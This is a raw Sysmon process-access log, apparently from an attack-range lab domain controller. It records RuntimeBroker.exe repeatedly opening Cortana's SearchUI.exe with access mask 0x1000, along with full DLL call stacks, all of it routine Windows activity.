12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000007572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
